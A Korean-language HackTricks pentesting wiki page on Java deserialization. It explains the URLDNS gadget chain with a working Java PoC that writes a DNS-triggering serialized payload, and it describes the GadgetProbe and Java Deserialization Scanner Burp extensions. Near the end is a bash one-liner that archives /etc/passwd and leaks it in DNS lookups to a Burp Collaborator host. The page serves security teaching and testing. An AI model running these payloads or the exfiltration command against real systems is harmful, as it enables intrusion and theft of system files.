mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
188 lines
9.5 KiB
Markdown
188 lines
9.5 KiB
Markdown
# Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|
|
|
|
## DNS 요청 및 역직렬화
|
|
|
|
클래스 `java.net.URL`는 `Serializable`을 구현합니다. 이는 이 클래스가 직렬화될 수 있음을 의미합니다.
|
|
```java
|
|
public final class URL implements java.io.Serializable {
|
|
```
|
|
이 클래스는 **호기심 많은 동작**을 가지고 있습니다. 문서에서: “**두 호스트는 두 호스트 이름이 동일한 IP 주소로 확인될 수 있는 경우 동등한 것으로 간주됩니다**.”\
|
|
따라서, URL 객체가 **`equals`** 또는 **`hashCode`**의 **어떤** 함수를 호출할 때마다 **IP 주소**를 얻기 위한 **DNS 요청**이 **전송**됩니다.
|
|
|
|
**URL** 객체에서 **`hashCode`** 함수를 **호출하는** 것은 상당히 쉽습니다. 이 객체를 **역직렬화**될 `HashMap`에 삽입하기만 하면 됩니다. 이는 `HashMap`의 **`readObject`** 함수의 **끝**에서 이 코드가 실행되기 때문입니다:
|
|
```java
|
|
private void readObject(java.io.ObjectInputStream s)
|
|
throws IOException, ClassNotFoundException {
|
|
[ ... ]
|
|
for (int i = 0; i < mappings; i++) {
|
|
[ ... ]
|
|
putVal(hash(key), key, value, false, false);
|
|
}
|
|
```
|
|
모든 값에 대해 `HashMap` 내부의 `putVal`을 **실행**할 **것입니다**. 그러나 더 중요한 것은 모든 값에 대해 `hash`를 호출하는 것입니다. 이것은 `hash` 함수의 코드입니다:
|
|
```java
|
|
static final int hash(Object key) {
|
|
int h;
|
|
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
|
|
}
|
|
```
|
|
관찰할 수 있듯이, **역직렬화할 때** **`HashMap`**의 함수 `hash`는 **모든 객체에 대해 실행됩니다** 그리고 **`hash`** 실행 중에 **객체의 `.hashCode()`가 실행됩니다**. 따라서 **URL** 객체를 포함하는 **`HashMap`**을 **역직렬화**하면, **URL 객체**는 **`.hashCode()`를 실행합니다**.
|
|
|
|
이제 `URLObject.hashCode()`의 코드를 살펴보겠습니다:
|
|
```java
|
|
public synchronized int hashCode() {
|
|
if (hashCode != -1)
|
|
return hashCode;
|
|
|
|
hashCode = handler.hashCode(this);
|
|
return hashCode;
|
|
```
|
|
보시다시피, `URLObject`가 `.hashCode()`를 실행할 때 `hashCode(this)`가 호출됩니다. 이 함수의 코드를 계속해서 볼 수 있습니다:
|
|
```java
|
|
protected int hashCode(URL u) {
|
|
int h = 0;
|
|
|
|
// Generate the protocol part.
|
|
String protocol = u.getProtocol();
|
|
if (protocol != null)
|
|
h += protocol.hashCode();
|
|
|
|
// Generate the host part.
|
|
InetAddress addr = getHostAddress(u);
|
|
[ ... ]
|
|
```
|
|
`getHostAddress`가 도메인에 대해 실행되어 **DNS 쿼리**가 **시작**되는 것을 볼 수 있습니다.
|
|
|
|
따라서 이 클래스는 **역직렬화**가 가능하다는 것을 **증명**하기 위해 **DNS 쿼리**를 **시작**하거나, 심지어 **정보를 유출**하기 위해 **악용**될 수 있습니다(명령 실행의 출력을 서브도메인으로 추가할 수 있습니다).
|
|
|
|
### URLDNS 페이로드 코드 예제
|
|
|
|
[여기에서 ysoserial의 URDNS 페이로드 코드를 찾을 수 있습니다](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). 그러나 코딩을 이해하기 쉽게 하기 위해 ysoserial의 것을 기반으로 나만의 PoC를 만들었습니다:
|
|
```java
|
|
import java.io.File;
|
|
import java.io.FileInputStream;
|
|
import java.io.FileOutputStream;
|
|
import java.io.IOException;
|
|
import java.io.ObjectInputStream;
|
|
import java.io.ObjectOutputStream;
|
|
import java.lang.reflect.Field;
|
|
import java.net.InetAddress;
|
|
import java.net.URLConnection;
|
|
import java.net.URLStreamHandler;
|
|
import java.util.HashMap;
|
|
import java.net.URL;
|
|
|
|
public class URLDNS {
|
|
public static void GeneratePayload(Object instance, String file)
|
|
throws Exception {
|
|
//Serialize the constructed payload and write it to the file
|
|
File f = new File(file);
|
|
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
|
|
out.writeObject(instance);
|
|
out.flush();
|
|
out.close();
|
|
}
|
|
public static void payloadTest(String file) throws Exception {
|
|
//Read the written payload and deserialize it
|
|
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
|
|
Object obj = in.readObject();
|
|
System.out.println(obj);
|
|
in.close();
|
|
}
|
|
|
|
public static void main(final String[] args) throws Exception {
|
|
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
|
|
HashMap ht = new HashMap(); // HashMap that will contain the URL
|
|
URLStreamHandler handler = new SilentURLStreamHandler();
|
|
URL u = new URL(null, url, handler); // URL to use as the Key
|
|
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
|
|
|
|
// During the put above, the URL's hashCode is calculated and cached.
|
|
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
|
|
final Field field = u.getClass().getDeclaredField("hashCode");
|
|
field.setAccessible(true);
|
|
field.set(u, -1);
|
|
|
|
//Test the payloads
|
|
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
|
|
}
|
|
}
|
|
|
|
|
|
class SilentURLStreamHandler extends URLStreamHandler {
|
|
|
|
protected URLConnection openConnection(URL u) throws IOException {
|
|
return null;
|
|
}
|
|
|
|
protected synchronized InetAddress getHostAddress(URL u) {
|
|
return null;
|
|
}
|
|
}
|
|
```
|
|
### 추가 정보
|
|
|
|
- [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
|
|
- 원래 아이디어에서 commons collections 페이로드는 DNS 쿼리를 수행하도록 변경되었으며, 이는 제안된 방법보다 신뢰성이 떨어졌지만, 이 게시물이 있습니다: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
|
|
|
|
## GadgetProbe
|
|
|
|
[**GadgetProbe**](https://github.com/BishopFox/GadgetProbe)를 Burp Suite App Store (Extender)에서 다운로드할 수 있습니다.
|
|
|
|
**GadgetProbe**는 서버의 Java 클래스에 일부 **Java 클래스가 존재하는지** 확인하여 **취약한지** 알 수 있도록 합니다.
|
|
|
|
### 작동 방식
|
|
|
|
**GadgetProbe**는 이전 섹션의 **DNS 페이로드**를 사용하지만 **DNS 쿼리를 실행하기 전에** **임의의 클래스를 역직렬화**하려고 시도합니다. **임의의 클래스가 존재하면**, **DNS 쿼리**가 **전송**되고 GadgetProbe는 이 클래스가 존재함을 기록합니다. **DNS** 요청이 **결코 전송되지 않으면**, 이는 **임의의 클래스가 성공적으로 역직렬화되지 않았음을** 의미하므로, 클래스가 존재하지 않거나 **직렬화할 수 없거나/악용할 수 없음을** 나타냅니다.
|
|
|
|
GitHub 내에서, [**GadgetProbe에는 테스트할 Java 클래스가 포함된 단어 목록이 있습니다**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists).
|
|
|
|
 (1).gif>)
|
|
|
|
### 추가 정보
|
|
|
|
- [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
|
|
|
|
## Java 역직렬화 스캐너
|
|
|
|
이 스캐너는 Burp App Store (**Extender**)에서 **다운로드**할 수 있습니다.\
|
|
**확장**은 **수동** 및 **능동** **기능**을 가지고 있습니다.
|
|
|
|
### 수동
|
|
|
|
기본적으로 모든 요청과 응답을 **수동으로 확인**하여 **Java 직렬화 마법 바이트**를 찾고, 발견된 경우 취약성 경고를 표시합니다:
|
|
|
|
.png>)
|
|
|
|
### 능동
|
|
|
|
**수동 테스트**
|
|
|
|
요청을 선택하고 마우스 오른쪽 버튼을 클릭한 후 `Send request to DS - Manual Testing`을 선택할 수 있습니다.\
|
|
그런 다음, _Deserialization Scanner Tab_ --> _Manual testing tab_에서 **삽입 지점**을 선택하고 **테스트를 시작**합니다 (사용된 인코딩에 따라 적절한 공격을 선택).
|
|
|
|
|
|
|
|
이것이 "수동 테스트"라고 불리지만, 상당히 **자동화되어** 있습니다. **역직렬화**가 **어떤 ysoserial 페이로드**에 **취약한지** 자동으로 확인하고, 웹 서버에 존재하는 라이브러리를 검사하여 취약한 라이브러리를 강조 표시합니다. **취약한 라이브러리**를 **확인**하기 위해 **Javas Sleeps**, **CPU** 소비를 통한 **슬립**, 또는 이전에 언급된 **DNS**를 사용할 수 있습니다.
|
|
|
|
**악용**
|
|
|
|
취약한 라이브러리를 식별한 후, 요청을 _Exploiting Tab_으로 보낼 수 있습니다.\
|
|
이 탭에서 **주입 지점**을 다시 **선택**하고, 페이로드를 생성할 **취약한 라이브러리**와 **명령어**를 **작성**해야 합니다. 그런 다음, 적절한 **공격** 버튼을 누릅니다.
|
|
|
|
|
|
|
|
### Java 역직렬화 DNS 유출 정보
|
|
|
|
페이로드가 다음과 같은 작업을 수행하도록 만드세요:
|
|
```bash
|
|
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
|
|
```
|
|
### 추가 정보
|
|
|
|
- [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
|
|
|
|
{{#include ../../banners/hacktricks-training.md}}
|